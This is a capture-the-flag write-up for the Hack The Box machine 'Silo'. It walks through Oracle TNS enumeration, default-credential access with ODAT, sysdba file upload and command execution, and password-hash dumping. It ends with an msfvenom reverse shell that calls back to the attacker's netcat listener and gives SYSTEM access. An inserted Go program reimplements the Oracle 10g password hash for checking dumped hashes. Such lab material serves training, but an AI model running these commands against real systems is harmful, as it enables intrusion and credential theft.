Hack The Box : Silo
4 August, 2021
Starting off with an nmap scan
# nmap -A 10.10.10.82
Starting Nmap 7.91 ( https://nmap.org )
Nmap scan report for 10.10.10.82
Host is up (0.40s latency).
Not shown: 988 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: IIS Windows Server
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp open oracle-tns Oracle TNS listener 11.2.0.2.0 (unauthorized)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49159/tcp open oracle-tns Oracle TNS listener (requires service name)
49160/tcp open msrpc Microsoft Windows RPC
49161/tcp open msrpc Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
Network Distance: 2 hops
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: supported
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-08-04T15:02:16
|_ start_date: 2021-08-04T14:58:30
TRACEROUTE (using port 1025/tcp)
HOP RTT ADDRESS
1 334.53 ms 10.10.16.1
2 167.50 ms 10.10.10.82
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 176.41 seconds
Headers indicate that the IIS server is powered by ASP.NET
# curl -v http://10.10.10.82
* Trying 10.10.10.82:80...
* Connected to 10.10.10.82 (10.10.10.82) port 80 (#0)
> GET / HTTP/1.1
> Host: 10.10.10.82
> User-Agent: curl/7.74.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Content-Type: text/html
< Accept-Ranges: bytes
< ETag: "1114bde2a84d31:0"
< Server: Microsoft-IIS/8.5
< Content-Length: 701
<
I couldn't find anything with Gobuster, Nikto or SMB enumeration, so I went ahead and searched for exploits for Windows Server 2008 R2.
# searchsploit microsoft server 2008 r2
--------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                | Path
--------------------------------------------------------------------------------------------- ---------------------------------
Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17-010) | windows_x86-64/remote/41987.py
--------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results
This exploit looked promising, but it kept failing because the box reset the connection.
# python3 /usr/share/exploitdb/exploits/windows_x86-64/remote/41987.py 10.10.10.82
[*] MS17-010 Exploit - SMBv1 SrvOs2FeaToNt OOB
[*] Exploit running.. Please wait
Traceback (most recent call last):
File "/usr/share/exploitdb/exploits/windows_x86-64/remote/41987.py", line 133, in <module>
main(sys.argv[1])
File "/usr/share/exploitdb/exploits/windows_x86-64/remote/41987.py", line 119, in main
data = [j['socket'].recv(2048) for j in connections if j['stream'] == i[1]]
File "/usr/share/exploitdb/exploits/windows_x86-64/remote/41987.py", line 119, in <listcomp>
data = [j['socket'].recv(2048) for j in connections if j['stream'] == i[1]]
ConnectionResetError: [Errno 104] Connection reset by peer
I decided to look at port 1521 next, which runs the Oracle TNS Listener. TNS names are aliases for database services, and the TNS Listener acts as a lookup directory for them.
$ tnscmd10g --10G status -h 10.10.10.82
sending (CONNECT_DATA=(CID=(PROGRAM=)(HOST=linux)(USER=oracle))(COMMAND=ping)(ARGUMENTS=64)(SERVICE=LISTENER)(VERSION=169869568)) to 10.10.10.82:1521
writing 179 bytes
reading
.A......"..5(DESCRIPTION=(TMP=)(VSNNUM=0)(ERR=0)(ALIAS=LISTENER))
I kept getting the same response for every command I sent through tnscmd10g, so I assumed the listener is protected, meaning I'd have to find some credentials.
I started looking for SIDs and found one: XE.
# nmap --script +oracle-sid-brute -p 1521 10.10.10.82
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-05 10:36 EDT
Nmap scan report for 10.10.10.82
Host is up (0.18s latency).
PORT STATE SERVICE
1521/tcp open oracle
| oracle-sid-brute:
|_ XE
Nmap done: 1 IP address (1 host up) scanned in 521.07 seconds
I followed the HackTricks guide to testing port 1521: https://book.hacktricks.xyz/pentesting/1521-1522-1529-pentesting-oracle-listener
Using ODAT, I found credentials for the SID XE.
[+] Accounts found on 10.10.10.82:1521/sid:XE:
scott/tiger
I tried two of the RCE methods mentioned there, but didn't have enough privileges to execute commands.
$ ./odat.py dbmsscheduler -s 10.10.10.82 -d XE -U scott -P tiger --exec "C:\windows\system32\cmd.exe /c echo 123>>"
[1] (10.10.10.82:1521): Execute the `C:\windows\system32\cmd.exe /c echo 123>>` on the 10.10.10.82 server
[-] The `C:\windows\system32\cmd.exe /c echo 123>>` command was not executed on the 10.10.10.82 server: `ORA-27486: insufficient privileges ORA-06512: at "SYS.DBMS_ISCHED", line 124 ORA-06512: at "SYS.DBMS_SCHEDULER", line 271 ORA-06512: at line 1`
[+] The Job is running
$ ./odat.py externaltable -s 10.10.10.82 -U scott -P tiger -d XE --exec "C:/windows/system32" "/c echo 123"
[1] (10.10.10.82:1521): Execute the /c echo 123 command stored in the C:/windows/system32 path
[-] There is an error: `ORA-01031: insufficient privileges`
I tried to upload a file, hoping I could put it in the directory served by IIS.
$ ./odat.py utlfile -s 10.10.10.82 -U scott -P tiger -d XE --putFile "C:\inetpub\wwwroot" temp.txt temp.txt
[1] (10.10.10.82:1521): Put the temp.txt local file in the C:\inetpub\wwwroot folder like temp.txt on the 10.10.10.82 server
[-] Impossible to put the temp.txt file: `ORA-01031: insufficient privileges`
I read more about the ODAT tool and learnt about the --sysdba flag. With it I was able to run commands, but uploading a file still gave an error.
# ./odat.py externaltable -s 10.10.10.82 -U scott -P tiger -d XE --sysdba --exec "C:/windows/system32/" "cmd.exe"
[1] (10.10.10.82:1521): Execute the cmd.exe command stored in the C:/windows/system32/ path
[+] The cmd.exe command stored in C:/windows/system32/ has been executed (normally)
# ./odat.py dbmsadvisor -s 10.10.10.82 -U scott -P tiger -d XE --sysdba --putFile C:\\inetpub\\wwwroot temp.txt ./temp.txt
[1] (10.10.10.82:1521): Put the ./temp.txt local file in the C:\inetpub\wwwroot path (named temp.txt) of the 10.10.10.82 server
[-] The ./temp.txt local file was not put in the remote C:\inetpub\wwwroot path (named temp.txt): `ORA-06550: line 1, column 7: PLS-00306: wrong number or types of arguments in call to 'CREATE_FILE' ORA-06550: line 1, column 7: PL/SQL: Statement ignored`
Next, I ran ODAT's passwordstealer command and got a list of password hashes.
# ./odat.py passwordstealer -s 10.10.10.82 -U scott -P tiger -d XE --sysdba --get-passwords
[1] (10.10.10.82:1521): Try to get Oracle hashed passwords
[+] Here are Oracle hashed passwords (some accounts can be locked):
[+] Here are 10g Oracle hashed passwords for oclHashcat (some accounts can be locked):
[+] Here are 10g Oracle hashed passwords for John the Ripper (some accounts can be locked):
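The "10g" hashes ODAT dumps above are what makes the cracking step cheap: the input is case-folded, the username is the only salt, and the verifier is a 64-bit DES CBC-MAC under a fixed, published key. As an added example (not from the original writeup or from ODAT), this Go program implements that hash and confirms that the dumped SCOTT hash really is the default scott/tiger credential found earlier; Oracle10gHash, desCBCMAC and MatchesDumpedHash are names of my own, and ASCII usernames and passwords are assumed.

```go
package main

import (
	"crypto/cipher"
	"crypto/des"
	"encoding/hex"
	"fmt"
	"strings"
)

// Oracle10gHash reproduces the pre-11g Oracle password hash that ODAT dumps
// as "10g Oracle hashed passwords": case-folded input, the username as the only
// salt, and a 64-bit DES CBC-MAC under a fixed, published key. That is why these
// verifiers fall quickly to offline guessing. ASCII input is assumed.
func Oracle10gHash(username, password string) string {
	// Step 1: uppercase USERNAME||PASSWORD, widen to UTF-16BE, zero-pad to 8-byte blocks.
	var data []byte
	for _, c := range []byte(strings.ToUpper(username + password)) {
		data = append(data, 0x00, c)
	}
	if rem := len(data) % des.BlockSize; rem != 0 {
		data = append(data, make([]byte, des.BlockSize-rem)...)
	}
	// Step 2: DES-CBC with the fixed key and a zero IV; keep the final block.
	fixedKey := []byte{0x01, 0x23, 0x45, 0x67, 0x89, 0xAB, 0xCD, 0xEF}
	intermediate := desCBCMAC(fixedKey, data)
	// Step 3: DES-CBC again, keyed with that block; the final block is the stored hash.
	return strings.ToUpper(hex.EncodeToString(desCBCMAC(intermediate, data)))
}

// desCBCMAC encrypts data with DES-CBC (zero IV) and returns the last ciphertext block.
func desCBCMAC(key, data []byte) []byte {
	block, err := des.NewCipher(key)
	if err != nil {
		panic(err) // unreachable: both keys are exactly 8 bytes
	}
	out := make([]byte, len(data))
	cipher.NewCBCEncrypter(block, make([]byte, des.BlockSize)).CryptBlocks(out, data)
	return out[len(out)-des.BlockSize:]
}

// MatchesDumpedHash is the audit check for a known default account: does the
// dumped hash equal the hash of the documented default credential?
func MatchesDumpedHash(username, password, dumpedHash string) bool {
	return Oracle10gHash(username, password) == strings.ToUpper(dumpedHash)
}

func main() {
	fmt.Println(Oracle10gHash("scott", "tiger"), MatchesDumpedHash("scott", "tiger", "F894844C34402B67")) // F894844C34402B67 true
}
```

The same check run over every dumped account against a list of vendor defaults is a quick way to find unlocked default accounts before someone else does.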
While JtR was cracking the hashes, I tried the utlfile command with the --sysdba flag and it worked, so I could upload a file after all.
$ ./odat.py utlfile -s 10.10.10.82 -U scott -P tiger -d XE --sysdba --putFile "C:\inetpub\wwwroot" temp.txt temp.txt
[1] (10.10.10.82:1521): Put the temp.txt local file in the C:\inetpub\wwwroot folder like temp.txt on the 10.10.10.82 server
[+] The temp.txt file was created on the C:\inetpub\wwwroot directory on the 10.10.10.82 server like the temp.txt file
$ curl 10.10.10.82/temp.txt
TEMPORARY FILE!
Flags
Using the file upload and execution capabilities, I uploaded a reverse shell binary and got a shell straight away as NT AUTHORITY\SYSTEM, which was enough to grab both flags.
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.16.174 LPORT=4445 -a x64 -f exe > shell.exe
$ ./odat.py utlfile -s 10.10.10.82 -U scott -P tiger -d XE --sysdba --putFile "C:\inetpub\wwwroot" shell.exe shell.exe
[1] (10.10.10.82:1521): Put the ../Boxes/Silo/shell.exe local file in the C:\inetpub\wwwroot folder like shell3.exe on the 10.10.10.82 server
[+] The ../Boxes/Silo/shell.exe file was created on the C:\inetpub\wwwroot directory on the 10.10.10.82 server like the shell3.exe file
$ ./odat.py externaltable -s 10.10.10.82 -U scott -P tiger -d XE --sysdba --exec "C:\inetpub\wwwroot" "shell.exe"
# nc -lvnp 4445
listening on [any] 4445 ...
connect to [10.10.16.174] from (UNKNOWN) [10.10.10.82] 49167
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\oraclexe\app\oracle\product\11.2.0\server\DATABASE>dir
Volume in drive C has no label.
Volume Serial Number is 78D4-EA4D
Directory of C:\oraclexe\app\oracle\product\11.2.0\server\DATABASE
01/01/2018 01:48 AM <DIR> .
01/01/2018 01:48 AM <DIR> ..
01/01/2018 01:11 AM 2,048 hc_xe.dat
01/01/2018 01:12 AM 73 initXE.ora
05/29/2014 01:05 PM 31,744 oradba.exe
08/04/2021 03:58 PM 4,060 oradim.log
01/07/2018 02:25 PM 1,536 PWDXE.ora
5 File(s) 39,461 bytes
2 Dir(s) 14,524,948,480 bytes free
C:\oraclexe\app\oracle\product\11.2.0\server\DATABASE>whoami
nt authority\system
C:\oraclexe\app\oracle\product\11.2.0\server\DATABASE>dir C:\Users
dir C:\Users
Volume in drive C has no label.
Volume Serial Number is 78D4-EA4D
Directory of C:\Users
01/04/2018 10:40 PM <DIR> .
01/04/2018 10:40 PM <DIR> ..
01/03/2018 02:03 AM <DIR> .NET v2.0
01/03/2018 02:03 AM <DIR> .NET v2.0 Classic
01/03/2018 10:23 PM <DIR> .NET v4.5
01/03/2018 10:23 PM <DIR> .NET v4.5 Classic
01/01/2018 01:49 AM <DIR> Administrator
01/03/2018 02:03 AM <DIR> Classic .NET AppPool
01/07/2018 03:04 PM <DIR> Phineas
08/22/2013 04:39 PM <DIR> Public
0 File(s) 0 bytes
10 Dir(s) 14,524,948,480 bytes free
C:\oraclexe\app\oracle\product\11.2.0\server\DATABASE>type C:\Users\Phineas\Desktop\user.txt
type C:\Users\Phineas\Desktop\user.txt
<flag>
C:\oraclexe\app\oracle\product\11.2.0\server\DATABASE>type C:\Users\Administrator\Desktop\root.txt
type C:\Users\Administrator\Desktop\root.txt
<flag>